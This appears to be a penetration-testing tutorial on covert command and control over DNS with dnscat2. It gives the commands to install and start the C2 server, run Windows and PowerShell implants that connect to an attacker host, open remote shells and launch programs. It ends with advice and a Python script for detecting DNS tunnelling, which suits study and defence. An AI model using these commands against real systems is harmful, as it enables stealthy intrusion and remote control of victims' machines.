Even in the most restricted environments, DNS traffic is usually allowed so that hosts can resolve internal or external domains. This can be abused as a communication channel between a target host and a command and control server: commands and data are embedded inside DNS queries and responses, so detection is difficult because arbitrary commands are hidden within what looks like legitimate traffic.

This technique can be implemented with dnscat2, which creates a command and control channel over the DNS protocol. The tool uses a client (implant) written in C that must be executed on the target in order for the server to receive a connection. Traffic is transmitted in encrypted form, and the tool also supports authentication via pre-shared secrets.

The tool can be installed by running the following commands on a Kali Linux 2.0 machine.

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
bundle install
Dnscat2 - Download and Installation

The command and control server can be started with the following command.

ruby dnscat2.rb --dns "domain=pentestlab,host=192.168.1.169" --no-cache
Dnscat2 - Server

A compiled version of the client (implant) for Windows systems can be downloaded directly from here. From the command prompt of the target, the only requirement is to specify the DNS server in order to establish a connection with the C2 (Command & Control) server.

dnscat2-v0.07-client-win32.exe --dns server=192.168.1.169
Dnscat2 - Windows Client

From the dnscat2 console the red teamer can start interacting with the session that has been created:

session -i 1
Dnscat2 - Interactive Session

Executing “help” retrieves a list of the available commands:

Dnscat2 - List of Commands

Part of the functionality of dnscat2 is uploading and downloading files, executing other programs and obtaining a remote shell.

Obtaining a shell is easy with the “shell” command, which opens another session:

Dnscat2 - Shell

The following output will appear on the command prompt of the target:

Dnscat2 - Command Shell Request

The shell is interactive and fast, and all the commands are transferred over DNS traffic:

Dnscat2 - Executing Shell Commands

Launching another program remotely is possible by calling the executable:

exec notepad.exe
Dnscat2 - Start New Process

Luke Baggett developed a PowerShell version of the implant, which was introduced and described on the Black Hills Information Security website. The commands are the same, but additional features have been added, such as an interactive PowerShell session and the ability to run scripts directly from memory.

The following command needs to be executed from a PowerShell session on the target:

PS C:\> start-Dnscat2 -Domain pentestlab -DNSServer 192.168.1.169

It is also possible to establish a direct PowerShell session by running the following:

exec psh
Dnscat2 - PowerShell

A new console will be created with the ability to execute PowerShell commands and scripts:

Dnscat2 - PowerShell Command

Conclusion

There are various advantages of command and control over DNS with dnscat2. Some of them are:

  • Support of multiple sessions
  • Traffic encryption
  • Protection from MiTM attacks with a pre-shared secret key
  • Run PowerShell scripts directly from memory
  • Stealthy

Since detection is difficult because arbitrary commands are transferred behind legitimate DNS traffic, emphasis should be placed on monitoring the length of DNS queries and on allowing hosts to communicate only with trusted DNS servers.
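As an added, defender-side example (not from the original post or from the dnscat2 project), the following Python script applies the two checks suggested above to constructed sample DNS log lines: it flags queries sent to resolvers outside an approved list, unusually long query names, and labels whose character entropy looks like encoded data rather than a hostname. The log format, the resolver list and the thresholds are assumptions and should be tuned against a real baseline.

```python
import math
from collections import Counter
# Constructed sample resolver log lines (not real captures); assumed format:
# "client resolver qtype qname".
SAMPLE_LOG = """\
10.0.0.5 10.0.0.53 A www.example.com
10.0.0.5 10.0.0.53 A mail.example.com
10.0.0.7 192.168.1.169 TXT 4a8f2c3d9e1b7a6c5d4e3f2a1b0c9d8e.7f6e5d4c3b2a1908f7e6d5c4b3a29180.pentestlab
10.0.0.7 192.168.1.169 TXT 9d8e7f6a5b4c3d2e1f0a9b8c7d6e5f4a.pentestlab
10.0.0.7 192.168.1.169 CNAME 1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c.pentestlab
10.0.0.9 10.0.0.53 A cdn.static.example.org
"""

# Assumed policy and thresholds; tune them against your own DNS baseline.
APPROVED_RESOLVERS = {"10.0.0.53"}   # only these may be queried directly
LONG_QNAME = 50                      # total query-name length in characters
MIN_LABEL_FOR_ENTROPY = 16           # ignore short, natural-looking labels
HIGH_ENTROPY = 3.5                   # bits/char; hex-encoded blobs sit near 4

def shannon_entropy(s):
    # Bits of entropy per character of s (0.0 for an empty string).
    if not s:
        return 0.0
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in Counter(s).values())

def parse_log(text):
    # Split the whitespace-separated log into query records.
    rows = []
    for line in text.splitlines():
        if line.strip():
            client, resolver, qtype, qname = line.split()
            rows.append({"client": client, "resolver": resolver, "qtype": qtype, "qname": qname.rstrip(".")})
    return rows

def detect(rows):
    # One finding per (query, reason) that trips a DNS-tunnelling heuristic.
    findings = []
    for r in rows:
        reasons = []
        if r["resolver"] not in APPROVED_RESOLVERS:      # bypassing the trusted resolver
            reasons.append("unapproved_resolver")
        if len(r["qname"]) > LONG_QNAME:                  # data stuffed into the name
            reasons.append("long_qname")
        if any(len(l) >= MIN_LABEL_FOR_ENTROPY and shannon_entropy(l) > HIGH_ENTROPY
               for l in r["qname"].split(".")):           # encoded, not human-readable labels
            reasons.append("high_entropy_label")
        findings.extend({"client": r["client"], "qname": r["qname"], "reason": x} for x in reasons)
    return findings

if __name__ == "__main__":
    for f in detect(parse_log(SAMPLE_LOG)):
        print(f"{f['client']:<10} {f['reason']:<20} {f['qname']}")
```

In the sample, only the host talking to 192.168.1.169 trips the checks; each of its queries is flagged for the unapproved resolver and for the hex-looking labels, and two of the three are also flagged for length.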

References

https://github.com/iagox86/dnscat2

https://github.com/lukebaggett/dnscat2-powershell

https://www.blackhillsinfosec.com/powershell-dns-command-control-with-dnscat2-powershell/
